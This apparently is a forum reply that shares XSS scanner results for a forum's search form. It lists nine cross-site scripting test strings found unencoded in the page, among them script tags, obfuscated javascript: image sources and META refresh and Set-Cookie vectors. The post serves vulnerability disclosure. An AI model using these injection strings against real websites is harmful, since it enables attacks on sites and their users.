Hi Methodman,
Thanks for reporting, but there is more here: unnamed form::search - found unencoded: ; \ / ' =
Security Compass Logo
Test Results
XSS Heuristic Test Results
; \ / < > " ' =
Warnings:
Results:
The unencoded attack string was found in the html of the document. Other browsers may be vulnerable to this XSS string.
Tested value: <SCRIPT <B>document.vulnerable=true;</SCRIPT>
The unencoded attack string was found in the html of the document. Other browsers may be vulnerable to this XSS string.
Tested value: <IMG SRC="  javascript:document.vulnerable=true;">
The unencoded attack string was found in the html of the document. Other browsers may be vulnerable to this XSS string.
Tested value: <IMG SRC="javascript:document.vulnerable=true;">
The unencoded attack string was found in the html of the document. Other browsers may be vulnerable to this XSS string.
Tested value: <IMG SRC="jav ascript:document.vulnerable=true;">
The unencoded attack string was found in the html of the document. Other browsers may be vulnerable to this XSS string.
Tested value: <<SCRIPT>document.vulnerable=true;//<</SCRIPT>
The unencoded attack string was found in the html of the document. Other browsers may be vulnerable to this XSS string.
Tested value: <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=document.vulnerable=true;>
The unencoded attack string was found in the html of the document. Other browsers may be vulnerable to this XSS string.
Tested value: <SCRIPT>document.vulnerable=true;</SCRIPT>
The unencoded attack string was found in the html of the document. Other browsers may be vulnerable to this XSS string.
Tested value: <META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>document.vulnerable=true</SCRIPT>">
The unencoded attack string was found in the html of the document. Other browsers may be vulnerable to this XSS string.
Tested value: <meta http-equiv="refresh" content="0;url=javascript:document.vulnerable=true;">
Results generated on May 31, 2009 for hxtp://forum.avast.com/index.php?action=p*
There is an awful lot penetration testing left to do online, that is why we have so many online threats going on,
polonus
P.S. If I use the script in a query, Firekeeper flag that in Firefox, glad to have Firekeeper for this....